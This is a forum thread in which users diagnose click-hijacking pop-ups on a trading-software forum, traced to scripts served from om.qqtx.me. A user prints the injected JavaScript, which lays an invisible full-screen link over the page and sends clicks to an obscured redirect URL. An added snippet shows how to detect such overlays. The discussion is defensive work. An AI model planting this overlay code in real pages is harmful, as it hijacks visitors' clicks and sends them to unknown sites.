First, you must clear your cookies. This is how:
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again
So now that cookies are cleared, the behavior will be immediately repeatable:
7) Go to the Zorro forums.
8) Browse to any thread.
9) Hover your mouse anywhere in the screen.
No matter what, it looks like it wants to redirect you somewhere. See my screenshot #1.
So instead of clicking with my left mouse button, I right-click: Inspect. I get screenshot #2.
If I click on the sources tab, I get screenshot #3.
Notice the mysterious javascripts from om.qqtx.me. I saved them below, both in their original form and a readable format.
That second javascript has content **BEFORE** I click on the screen. But if I refresh the screen, the second script is **BLANK**. The disappearing script looks like it creates the bad link:
Code:
    (function() {
        var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0=")),
            b = document.body || document.getElementsByTagName("body")[0];
        if ("undefined" != b && null != b) {
            var a = document.createElement("div");
            a.id = "div" + Math.floor(999999 * Math.random() + 1E5);
            a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
            a.innerHTML = '<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' +
                x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) +
                '" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';
            a.onclick = function() {
                this.style.display = "none"
            };
            b.insertBefore(a, b.lastChild)
        }
    })();
I don't know much about HTML/CSS/JS, but this looks like it might be a sleeper script.
As a browser-side workaround, I can block these scripts in Chrome using the ScriptSafe add-in.
Settings:
1) Allow opserver.de to run scripts (allow, not trust).
2) Distrust om.qqtx.me
3) ScriptSafe options -> General Settings -> Default Mode -> Allow
No more pop-ups. (Also, step #3 is to stop blocking all other website scripts, such as Amazon. This Chrome extension wants to block all javascripts by default, which makes no sense.)
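Added example, not part of the original post: one way to recognise the overlay pattern described above (a fixed, full-viewport, top-most div wrapping a link to another host) from an element's inline style and inner HTML. The function names, the z-index threshold and the hosts `forum.example` and `redirect.example` are assumptions made for illustration.

```javascript
// Added example (not from the thread): flag a click-hijacking overlay.
// Pure functions, so they run in Node; in a browser, pass el.style.cssText
// and el.innerHTML for each child of document.body.

// Constructed sample mirroring the overlay in the post; hosts are placeholders.
const SAMPLE_CSS =
  "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
const SAMPLE_HTML =
  '<a href="http://redirect.example/redirect?i=1&u=x" target="_blank" ' +
  'style="display: block; width:100%; height: 100%; cursor: default"></a>';

// Parse "prop: value; ..." into a lowercase property map.
function parseCssText(cssText) {
  const props = {};
  for (const decl of cssText.split(";")) {
    const i = decl.indexOf(":");
    if (i < 0) continue;
    props[decl.slice(0, i).trim().toLowerCase()] =
      decl.slice(i + 1).trim().toLowerCase();
  }
  return props;
}

// Hostnames of every absolute href in an HTML fragment.
function linkHosts(html) {
  const hosts = [];
  const re = /href\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    try { hosts.push(new URL(m[1]).hostname); }
    catch (e) { /* relative URL: stays on the page's own host */ }
  }
  return hosts;
}

// List the suspicious traits of one element.
function overlayFindings(cssText, innerHTML, pageHost) {
  const css = parseCssText(cssText);
  const findings = [];
  if (css.position === "fixed" && css.width === "100%" && css.height === "100%")
    findings.push("covers-viewport");
  if (parseInt(css["z-index"], 10) >= 1000) findings.push("high-z-index"); // assumed threshold
  const foreign = linkHosts(innerHTML).filter((h) => h !== pageHost);
  if (foreign.length) findings.push("foreign-link:" + foreign.join(","));
  if (/cursor\s*:\s*default/i.test(innerHTML)) findings.push("hides-pointer-cursor");
  return findings;
}

// An overlay is reported only when it covers the page AND links off-site.
function isClickHijackOverlay(cssText, innerHTML, pageHost) {
  const f = overlayFindings(cssText, innerHTML, pageHost);
  return f.includes("covers-viewport") && f.some((x) => x.startsWith("foreign-link:"));
}
```

A legitimate full-screen element (a modal backdrop, for instance) covers the viewport but does not wrap an off-site link, so it is not reported.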
I've just checked the forum software, but cannot see an exploit or a source of mysterious popups. I also don't get them here, at least not with Chrome. Are they still there?
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again
7) Go to Zorro User Forum
8) Click on this thread ("Ads?!?!?!?!?!?!?")
9) Click anywhere in the web page... This should induce the pop-up.
10) Right-click anywhere on the web page and click "Inspect"
11) Click on the "Sources" tab
12) Now take a look at the tree - there should be two offensive javascripts loaded:
top -> om.qqtx.me -> jquery.jscroll.min.js
top -> om.qqtx.me -> jquery.jscroll.min.js?timestamp=[etc.]
I have identified these two scripts as the culprit. If I explicitly block these scripts, I get no pop-ups.
It's still there btw!!! Randomly. This time it took me permission to post
Last edited by rayp; 10/22/18 16:40.
Acknex surrounds us...between you, me, the stone there... "Hey Griswold ... where u gonna put a tree that big ?" 1998 i married my loved wife ... Sheeva from Mortal Kombat, not Evil-Lyn as might have been expected rayp.flags |= UNTOUCHABLE;
Did you clear your cookies correctly? Try again. I get consistent behavior if and only if I clear my cookies all the time. (Hint: There is a sleep timer variable.)
I posted in mods and wrote a PM. Now I can't do more. Till now I got no answer...maybe admin is busy, yes.
Edit: Just was redirected with edit button...damn that sucks...
edit2: And directly after this...site was again overlaid with invisible link...
edit: I used an old tab I had open to write here, I can't use page at all now. The link is always there now for me.
edit: Ok I have control again...only "Deleting all temp Internet files and stuff" gave me control back. Wow!
Last edited by rayp; 10/22/18 20:57.
I have the infection feeling since the weekend. It's a fact that an invisible link layers the forum pages sometimes.
If you only look at the http site names...very long random names. Also I realized blocked popups now, sometimes.
@all Check the link you're clicking on this page in detail. Watch your cursor when hovering over links. Or disable / block the script you can see in screenshots above.
Last edited by rayp; 10/22/18 22:03.
The inserted "document.writeln" line found by AndrewAMD would indeed redirect clicks to a script on om.qqtx.me. But this line isn't in the forum source code. I also don't get that popup after deleting the cookies. So the source is apparently not infected, at least not now, but possibly the cache.
I will clear the cache now. Please report when you observe the popup again or something else that is unusual.
I'm not seeing it (blocker: disabled), but I guess that maybe depends on which cached server I'm using? Or perhaps your browser is infected?
Try this:
1) Clear browser cache/cookies.
2) Go back to forums.
3) See if it happens again after an hour or two.
4) If so, paste the contents of this javascript here in the forums:
Edit: After deleting all i files again it seems ok for now. Will test later with my PC
Edit: From my mobile phone still there now.
Edit: Seems ok for now. Not much clicked yet but what I clicked was what it looked like.
Last edited by rayp; 10/23/18 20:36.